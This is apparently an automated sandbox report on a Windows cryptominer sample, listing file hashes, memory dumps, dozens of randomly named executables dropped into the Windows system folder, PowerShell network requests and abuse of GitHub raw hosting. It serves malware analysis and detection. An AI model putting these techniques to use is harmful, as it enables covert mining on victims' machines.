SHA512 555e036d9241d714be4c7e14765c17cb9c72307ae5a41982bfb7a7a3395b504767a61d22c712d659fe3a6af6f7761c22fdf06436f84023a2a8f16812e2bd3c6a

C:\Windows\system\acxakzg.exe

MD5 9bbb964faeb1b59eeac0d482617b5bcb
SHA1 4d8e7dc313a3c6c3bb6f12edb5f350b657ec5ee2
SHA256 2a729d02311633aff1aa2232478aea20105fb9f42af49fd688f9e2697a448e35
SHA512 1da214eda02513c7f9d4b84165a07cda976221618a58d7a50c4ad7386d2b2d921e00687f78bbb65a06be4cc3718c0d76839c27f65f2102524da3d7f3ff76c184

C:\Windows\system\XWWfxFp.exe

MD5 925c0af62eaaf65e00d6dbc414816d57
SHA1 cac2927f3d1f47e06a26cb0109d9298899e49075
SHA256 1c4c9499d10163fbfefa8d1d0e92332e9f54164fcc8be0bf34dbbe15b33d63d1
SHA512 6ac30c93dd3058d5f632d62a940cdba087963d0ea77276a358196e8f3f3a7c3a99d2865023ed681fec9c8b51927ed98a81130f68d0fe68efc29e9df332f35c11

\Windows\system\bfrQjnx.exe

MD5 c2f4da9d1ef5ad2b727bb9619ebfe7d3
SHA1 8bed4cf6e2475d8f1e1d070abd0bfbd9cad7454a
SHA256 d77a3d4681685defe1b8464b0d12990b5ab4fbe9ae8d34cffe4bd0004d30d701
SHA512 9d5cdbc4a549a05ebfe74bb29483b8a9e1d88db03531c55efb3db8ee06fc8537536eddc972239fd0b88f7d38bb82f07ad2a8e39080d7cf06607f17ea49baea5f

\Windows\system\KNIfQfP.exe

MD5 78ca6940d2e6655f1bd2de9579ef8cdd
SHA1 4eeab3f99283c31fc3355833e69d89f4f99627b3
SHA256 450d47658c897097f2d3adedd8e686f761bd781a2b3eeafd089c1654056ac592
SHA512 e7a239567665585fd39d94d40ff46d27e7076501be6644a48ab5675fcbe8220072dae5d2931285b28c0b4fe9960f62a5de9b6e1358b749f05fb0401e40e67d01

C:\Windows\system\opBLzAT.exe

MD5 e7ed0c07e9b39977d11a868651a7ca1a
SHA1 1e939e387ed6be26748641ba7006ac23ed420d0d
SHA256 9cea6c54f2f679d787dd87954bee980a085eb4a79ef373f9a44bc0928eeebad1
SHA512 11a76da41f70509b6f374f4827b4ddab263b25647194b2c8ea01555eb15191511a94731becb947e39ef8273692180e48adfc0d12851aed6c0df8641c093a0df3

\Windows\system\bqBflpu.exe

MD5 b90243f05d2963e90c563761f607f468
SHA1 588740a26f40bfc97169506d4e20615bd0ef638d
SHA256 da58166103daf0e34b55115887b564f7e948aa30db14edc80c8685694a6fdec4
SHA512 5b46689e6d3c796c0040a0df8eefcf99636ee4c48d249254a88d4f2e555c5c88986e576f67996a6ab8b0347a1b2fb25a722729520f3dba9efc1d4128eecc5416

C:\Windows\system\Sitjwla.exe

MD5 013f20a3076a362a1c73eb34682e9de9
SHA1 5cf342d635a5f1390ac9d7afe3882cf455cdc447
SHA256 009115f40e0d5424e2f8437da97baa894e46dff935e110b27a2ffd37f92a82bb
SHA512 4d1b23b745f27673ac8a822355706c89414d86bcb141a6ebbf8087de8e4ed34335f3d63385f053c300c6539228d208b773482cfae90766c38a6611ef07e2c794

C:\Windows\system\zmzhbMd.exe

MD5 bb3875ebee9b11ded21926d8e9d38ede
SHA1 462f9274a9629233145ad8954245252ee4180a60
SHA256 09df6ffc5eaa487e2428f964e9510785a77eeab13da75001c9ea8345e6a9fa76
SHA512 abab3d03b68e80ca2c0cc3d99ef2da9ffccd4974e646bcc74717394b10678229c0890df006ca88ae239afd761919a2b1d96f469314a67528228d8a50c8cf686b

C:\Windows\system\NyUkQiF.exe

MD5 3629bdf7c363d41a3528c473470ea714
SHA1 44a362d9c4238c3653d6060b33ef20275f77c92e
SHA256 14176407674c14ee6a33e4ea712e51861ba51390d2813b4dd9f90b113197a198
SHA512 89b4913cc24bebe8f4bf30653e34661a467beba5dc74f233a302689e13e547cdbe108b558725082dbbd62663d1cfe4ff1fe243a67494f0f17bf9e5f718948f16

memory/1952-156-0x0000000003470000-0x0000000003862000-memory.dmp

memory/2192-702-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

C:\Windows\system\YyLHryZ.exe

MD5 f93becd0d7dd724c38361b18097686d7
SHA1 e6376a71fc4230e6d96191a2da790225e927a3fd
SHA256 e36508fd24c5fe9c6957e59017f42154e61bbec11de5a845c9d406dc413c6890
SHA512 52fc91277feecb048abd2d072ba7649e8c14c804f5e55322dbe1a97330a8a8a8b8791e6f2b9f3d199748d25c95e970bc306c817e77c35ad5c56569797107c9e8

C:\Windows\system\aLaewar.exe

MD5 f7fd319f1a894b0ec4a3ea9ef73e803a
SHA1 7761780d993e23ac10dcf652de15d0be6fbe3829
SHA256 b3c5c181ae80118954fdff9e14335415badcb5ccc8e6966275b0036f9f0d7fbc
SHA512 cab61333e280448c9f8b1d113bd19c21309982d9360dbdb57bfb287d786f473a5dfb5dde719bba6c400eb6353e2d2b6f20f95de6247027c00bafaffa9e613354

C:\Windows\system\aDpXoRl.exe

MD5 751f2a971d1de94cfcc5f1c8ca3a52a8
SHA1 d3eb35e6dce3a52f316e4ccc1ac712d0b6096de8
SHA256 1800e99f681a8ace839db594fe7d400c830eed424be28ddeb5f642dd9095a6b5
SHA512 f53fe8a5fe97e41292f9b676702eea1494923814e7aa17b31f767978ba59e8745b2229269d1c6ef4abe405e0e3d935ff02d848f75617e3e16638e4afd73b41f5

C:\Windows\system\cxfpozJ.exe

MD5 a761ebc3d740f49766ae0359e59a7b05
SHA1 dd04985af730d51b640060a479e2c118c5fe7a0f
SHA256 ead36aba69974fd5080835854d3d5e8b540946950cb21f16d7669afba1d7c4eb
SHA512 6c4e3c723b553b4522ea5afe2f9da670343e78437a690b8136df46feb48419e4f56725b6f52c2d568981cef81ff5955a41827941883c479b40d7b44ae2a33ae9

C:\Windows\system\AWQucSh.exe

MD5 c1d1f7270bc8ab5967b76fc820b1f07f
SHA1 af60039b133607da918b7e94791d80acc671afb7
SHA256 68abb563c367afcd4a7e19f67b44b7b3abd06eb7611a2df3d6ca27dbd7dd7ec6
SHA512 ed2ef7e7be1472422f0f3035f8fe93f54812b1ff5533a23522e9e09a60bd89dbbb3e1e079ea3f66f2d6f41c03125b6b11bfd2bc2795f88c9b65247edb9157e5f

memory/1728-168-0x000000013F950000-0x000000013FD42000-memory.dmp

memory/3052-167-0x000000013F2C0000-0x000000013F6B2000-memory.dmp

memory/2692-166-0x000000013F0F0000-0x000000013F4E2000-memory.dmp

memory/1952-165-0x000000013F0F0000-0x000000013F4E2000-memory.dmp

memory/2960-164-0x000000013F060000-0x000000013F452000-memory.dmp

memory/1952-163-0x000000013F0A0000-0x000000013F492000-memory.dmp

memory/2192-162-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

memory/1952-161-0x000000013F060000-0x000000013F452000-memory.dmp

memory/1952-160-0x0000000003470000-0x0000000003862000-memory.dmp

memory/2532-159-0x000000013FDF0000-0x00000001401E2000-memory.dmp

memory/1952-158-0x000000013FDF0000-0x00000001401E2000-memory.dmp

memory/2472-157-0x000000013FA70000-0x000000013FE62000-memory.dmp

memory/2508-155-0x000000013F510000-0x000000013F902000-memory.dmp

memory/1952-154-0x0000000003470000-0x0000000003862000-memory.dmp

memory/2488-153-0x000000013F2F0000-0x000000013F6E2000-memory.dmp

memory/1952-152-0x000000013F2F0000-0x000000013F6E2000-memory.dmp

memory/2776-151-0x000000013FFE0000-0x00000001403D2000-memory.dmp

memory/1952-150-0x000000013FFE0000-0x00000001403D2000-memory.dmp

memory/2752-140-0x000000013F710000-0x000000013FB02000-memory.dmp

memory/2192-129-0x0000000001F70000-0x0000000001F78000-memory.dmp

memory/2192-127-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

C:\Windows\system\usMjTnG.exe

MD5 5cc55e5b50f1384e546e2633771f6942
SHA1 d214d4f7438298d52469a3f5d20535ca44b54ada
SHA256 c20efcb0dd23be87c9f59654a5a96385c6fc41a6dc23a6b3ba7778da690b0c4c
SHA512 f23228b3d8b71f8013bf0255278773d4dda3b99fa724cfd6251ff089e050a1997d99cc13949df38b66698aa973e481255de2ae116c0b621ab8eecf8e1dcffa64

C:\Windows\system\VAXGrfI.exe

MD5 47199866e959257ed56164f05270cd39
SHA1 81bf31465a68dfd84168ef38f952c96bb6dcd240
SHA256 1fe14db07a04a1a83f06920025c7c5257a398c960233f3e44756ac74a43d5b3b
SHA512 365d8070db4b5610ef4afb3fec8be90105bb22c5bd78721e14814db6ba53370cb0b832e83905cfab1f72466908894d29b9bcd888dbd3941a998907a031819189

C:\Windows\system\OhvQrSL.exe

MD5 3e0b691ff2940617a36a193702ea792f
SHA1 28237f7b349fd09c531a9a3616d5802ef6ac694a
SHA256 d1cb41a4593f90c3a2421312f164e4fd02ff4df7df2adc3ef90321938091f41a
SHA512 f233af8427dbca1e4e24dc87eaf0b6b7d47ae7d4aaa5c44260260a6bf25e98cd9045aabbbe503e1c40526d523667029156cd5e85c9935a6b143b004655efe8ae

C:\Windows\system\ZLWxMvX.exe

MD5 eb770011a85fe9f0a16bb5f847d80762
SHA1 4be0c9598d4b38d3114953c8e58a4de47210cac1
SHA256 8fb9dfbfde5c56568e723240e83e0f961f9536692daf938274b5f228c01cf224
SHA512 c87b5bd16c419085a97f90a9034241c524fb604d2c2d33a6036b308d02ca707ef391eb9e5aabf87407582051d07e14ecd5414c71ee24accd7a846b8af0e14a69

C:\Windows\system\foDoYkR.exe

MD5 a10dd8588d8a390f1dbaf48d1724793e
SHA1 9c8a1cb091bbff4412cae833b954bf9e5f33ee2a
SHA256 ada21173b5862a32a3acc7431273424f86b6783ec7040e415148d6f04825f7e6
SHA512 6d10ac9f0f5f962bbff7bff4e94eb9d92966b9870ef947555e16f9309ad08f82f24ef313f848ac88cb5faeba951972fef74199cd6880eca552a7f413e0b04169

C:\Windows\system\USbaVXl.exe

MD5 fd511000a1dd3f55fa7e8f6e6a14129d
SHA1 70ca33d9d7820c4d7465c6805a60bc5c1cd8851a
SHA256 faa408d8e065041c560f93b91db5c41e90df0e265124076af9f7f87539b5a137
SHA512 90058d07b484bcc58cb06ba1c343676c0de0a80c2cbc77785e7136854999f0498c9afce7927ed0daeaa5464ee6eaddfc4e35777bd86cad3b436614f9a77a9425

C:\Windows\system\uTpVneB.exe

MD5 2a8affdea7515c65e049b809159ecf79
SHA1 06e838cdc0c177fe5366d4bd47d79ae11630d7c5
SHA256 b38fdc5a8af67b9ac070a92a5c0f2bea8a642d273a1d366b8f3ad1f84772b401
SHA512 359aace7faf9f5be913bb10f02c3fed88892fb6d8def5880a4284a0af288c579ea9a8d7ccfef358da5b9f04c92c20c866a2ac16a7a3c32f3570d1891df828168

C:\Windows\system\hZGQPGI.exe

MD5 57e33cb33f510d6b61c2396a86e6c4e3
SHA1 ae60296f0a6f94f5468f8eb78c1a2fcdf3074b17
SHA256 d59230e0a9442c66b540e96406c952d4ce20db680f6e57b39de715760f1db300
SHA512 3092cd22a058f67ab3d3627da910a7751eae792406d37566df37dbb94f45b58a43e7738153ab4abc371711b9eb5f41499e4d235cf9d9cf2ba2a66b564249951f

C:\Windows\system\NQjTQrh.exe

MD5 29c5ef5c93d6baf3c8e6cd2de38e42d8
SHA1 1793b27e778ba107f1559efdf45be538200a5a7e
SHA256 37ee9783b65948fc3b8e1d5875eab3b8ddb98dca30a3c1de696ea7dd8564e719
SHA512 d1d75c5ef668026e0d0aa66622cd31e74863c8c0d9ef708e196f3e227831d57686a82916cd93b517960319abfd579910479131d1c9f7899fa3b3ef48829b0202

C:\Windows\system\KAuNvQR.exe

MD5 c1c351f8e733409fc0aa1822f17eb21a
SHA1 0e2eecc3d6fae26fb5e934b0642f036513c80b09
SHA256 e45b1bd1cea9d2122e948fa442de55a1fbe5ab4d6d0811724884a9ff89fa7df0
SHA512 0e25ebdc3917f473b605088151444ae0d94baf6b1bb93a4e2ee3d7ad3c08dd8e1db6fcaa4f33706ced2762198db98c0de998dbe175e33a9f5912b5127521992e

C:\Windows\system\DcuyZwn.exe

MD5 b91f8d800d721cd97aff4818c2d9dd11
SHA1 7864fcb73d10319e1955dffcd16705fa7c4bb273
SHA256 d09f6775436a5cbf274ff3ba2da1e7852907aeaaa5b0e726119b9bc23abdd4fd
SHA512 acff92e710e4e7b62207d86aef3995793d7284fd3451faea5d3a7205c29536d0c9cf0ebc40916a6ff402bab979ab64aacd53786f941286c850cb38b6da12b9f8

C:\Windows\system\SpQVfYH.exe

MD5 4f6cde5b5159dfd2157766127c794084
SHA1 cefe6518ae48be95109ac0ea5cbf40a67bca0847
SHA256 e39484816ca34029ab7c4311a16d81a54e13d9babcf9b4e51649f9b30a28f3cc
SHA512 70a19768f42e6811fd971274725ed0b3d2a4ccbfc16ace7017095ba9f2677ff324b5fa5f29996bcd0a788c454e96f624858988e76826ebd4e94896941033b601

\Windows\system\WBwDDtH.exe

MD5 ca4fb7440e6044919c420bcde2419475
SHA1 d182b60dc2b10faf4f715bf12f4c94ded69f4c72
SHA256 3bb34ef2ca3aa2aa0a92a31bb26a904461a321633a36d395b0205c92ef5636bb
SHA512 9f1b38c07614f5788d57bce2800d09fa2498bfa78ffc0c45b5a069322d78ae1e0266a1955f0cbb191eed33d0538f86a177c8e2fd3a47ab601d7966d0a559787c

memory/2192-60-0x000000001B5A0000-0x000000001B882000-memory.dmp

C:\Windows\system\pJSuRtd.exe

MD5 21dc9451a6634799524b764e63d9bd54
SHA1 b2f059303eb95f1cb4e9b0091e30f51470dbef0e
SHA256 f1e2a1c2063b28346d37d009abea70783340fab222c0756c1565abacf106f26b
SHA512 cdda1dea314cbbe4f87ae768c34959c74db0f71ef8cdff792924cdc0bbaec7104a7ba772194d9f718bb4876d613bcc23a9dc1f20b2bcfc95ae073ab16970621c

C:\Windows\system\eUWPOzx.exe

MD5 1a01e6218b302429ec46beaafeb3c83c
SHA1 da8916f1388c60572bc4ff49c70e56ab0de577d3
SHA256 0a5b55df7f0ffa81f92fbe03114c35e7c961580daf54d40a6a9c09b5dfe8de27
SHA512 62beb2a29c4e6509ecaefcd2e5b93cbd958e1e5af8c3dd9c61f55b0189728a61c51bef8d26ce3b6c328a450b0da5865a54467aec30d06d3ca8d5d2ce34333642

memory/2192-26-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmp

memory/1952-25-0x0000000003250000-0x0000000003642000-memory.dmp

memory/2604-24-0x000000013F2D0000-0x000000013F6C2000-memory.dmp

memory/1952-23-0x000000013F2C0000-0x000000013F6B2000-memory.dmp

C:\Windows\system\NpbbUzg.exe

MD5 3f9cfe8a165fbe5ed357bf4fb6550d1a
SHA1 d1f76cef8b11f404ce3021901f1968e523167625
SHA256 fe7331c05f745b95f5509c04136ec2be8073cae1c2054bbe90290f3a5e3a1c01
SHA512 7c297d93de1529b68ba232f55d08c5bdfcf13a5c3741f810e605eeec9da08911d3d07e6bd5c21436fbf2be3db2070f19515d3ae2f1e7604c2ff2f34139c616ce

memory/1728-3883-0x000000013F950000-0x000000013FD42000-memory.dmp

memory/2508-3880-0x000000013F510000-0x000000013F902000-memory.dmp

memory/2604-3799-0x000000013F2D0000-0x000000013F6C2000-memory.dmp

memory/2488-4022-0x000000013F2F0000-0x000000013F6E2000-memory.dmp

memory/2532-4050-0x000000013FDF0000-0x00000001401E2000-memory.dmp

memory/1952-4275-0x0000000003470000-0x0000000003862000-memory.dmp

memory/1952-4272-0x000000013F8C0000-0x000000013FCB2000-memory.dmp

memory/2960-4294-0x000000013F060000-0x000000013F452000-memory.dmp

memory/2692-4320-0x000000013F0F0000-0x000000013F4E2000-memory.dmp

memory/2472-4963-0x000000013FA70000-0x000000013FE62000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-03 12:44

Reported

2024-06-03 12:47

Platform

win10v2004-20240226-en

Max time kernel

109s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\WHaHHXd.exe N/A
N/A N/A C:\Windows\System\jguTwpF.exe N/A
N/A N/A C:\Windows\System\xvFaDQS.exe N/A
N/A N/A C:\Windows\System\XcdwAbu.exe N/A
N/A N/A C:\Windows\System\JTGbFjk.exe N/A
N/A N/A C:\Windows\System\dAMpoFG.exe N/A
N/A N/A C:\Windows\System\puCucRd.exe N/A
N/A N/A C:\Windows\System\uXmxyFI.exe N/A
N/A N/A C:\Windows\System\KRNUtEW.exe N/A
N/A N/A C:\Windows\System\nDAxWWo.exe N/A
N/A N/A C:\Windows\System\NWszkAv.exe N/A
N/A N/A C:\Windows\System\eKhsLOM.exe N/A
N/A N/A C:\Windows\System\osLNLvs.exe N/A
N/A N/A C:\Windows\System\ncYOZXQ.exe N/A
N/A N/A C:\Windows\System\gMmOCZG.exe N/A
N/A N/A C:\Windows\System\BhvpPhw.exe N/A
N/A N/A C:\Windows\System\edeHpFl.exe N/A
N/A N/A C:\Windows\System\ZUpXQhQ.exe N/A
N/A N/A C:\Windows\System\mrnahmd.exe N/A
N/A N/A C:\Windows\System\RpkLJtX.exe N/A
N/A N/A C:\Windows\System\BIEQtXh.exe N/A
N/A N/A C:\Windows\System\TIyFgSd.exe N/A
N/A N/A C:\Windows\System\DFYxUmB.exe N/A
N/A N/A C:\Windows\System\vzCjAER.exe N/A
N/A N/A C:\Windows\System\dOXMIvW.exe N/A
N/A N/A C:\Windows\System\svvYnGP.exe N/A
N/A N/A C:\Windows\System\FNTbZsG.exe N/A
N/A N/A C:\Windows\System\axApzns.exe N/A
N/A N/A C:\Windows\System\xGGKQby.exe N/A
N/A N/A C:\Windows\System\aveJlwi.exe N/A
N/A N/A C:\Windows\System\zgqVVGe.exe N/A
N/A N/A C:\Windows\System\RMmZSKY.exe N/A
N/A N/A C:\Windows\System\NMKoTQF.exe N/A
N/A N/A C:\Windows\System\UWXHwGX.exe N/A
N/A N/A C:\Windows\System\iwIQyvt.exe N/A
N/A N/A C:\Windows\System\ZagOynS.exe N/A
N/A N/A C:\Windows\System\rAdRtyU.exe N/A
N/A N/A C:\Windows\System\MBxFIYS.exe N/A
N/A N/A C:\Windows\System\FXqNuRj.exe N/A
N/A N/A C:\Windows\System\ziaFKRt.exe N/A
N/A N/A C:\Windows\System\UIzkXyM.exe N/A
N/A N/A C:\Windows\System\qlCYtVx.exe N/A
N/A N/A C:\Windows\System\flYwlbV.exe N/A
N/A N/A C:\Windows\System\WmtKFBV.exe N/A
N/A N/A C:\Windows\System\bbdlExE.exe N/A
N/A N/A C:\Windows\System\sHgoZXv.exe N/A
N/A N/A C:\Windows\System\lGFtFIT.exe N/A
N/A N/A C:\Windows\System\PZymOzS.exe N/A
N/A N/A C:\Windows\System\vMyyBey.exe N/A
N/A N/A C:\Windows\System\WRaxOjH.exe N/A
N/A N/A C:\Windows\System\IAwLozx.exe N/A
N/A N/A C:\Windows\System\Gfxkwph.exe N/A
N/A N/A C:\Windows\System\YwRwYqw.exe N/A
N/A N/A C:\Windows\System\oYkDlZm.exe N/A
N/A N/A C:\Windows\System\fVreReu.exe N/A
N/A N/A C:\Windows\System\TCrtvyz.exe N/A
N/A N/A C:\Windows\System\trutmOW.exe N/A
N/A N/A C:\Windows\System\cbrHepd.exe N/A
N/A N/A C:\Windows\System\cbGHKyA.exe N/A
N/A N/A C:\Windows\System\TCrFfBR.exe N/A
N/A N/A C:\Windows\System\pbIPhgI.exe N/A
N/A N/A C:\Windows\System\hSSUkLk.exe N/A
N/A N/A C:\Windows\System\VDOXgTE.exe N/A
N/A N/A C:\Windows\System\ZoPDFpk.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\uqdsUyZ.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\JEGydQn.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\QwzmtMr.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\dteeonE.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\CURWjzc.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\FKOipzO.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\fjwSBAI.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\EwePaDu.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\WRaxOjH.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\eLdchDG.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\NsiRLFl.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\ZrFyYAN.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\ahlIWNp.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\ihqYJGL.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\zMiTeYt.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\xwONncd.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\JuOPjKs.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\jnqCEKM.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\BkFvtoI.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\ENpRpPf.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\VqkJjUX.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\MQlAXoN.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\kJLfSYo.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\XlAlnnY.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\oKuzVLu.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\rlpxZYs.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\NAPEqXu.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\DeGuRNQ.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\EwFMuKG.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\VmMGfyE.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\hLHaLVX.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\rTQuUxZ.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\cvyUguz.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\hApQrRL.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\ecRqOWS.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\GdRbXyo.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\PYHnFRw.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\lsEvDXe.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\zERarUD.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\AptmYFA.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\uEQBZkd.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\EtYswwt.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\YwRwYqw.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
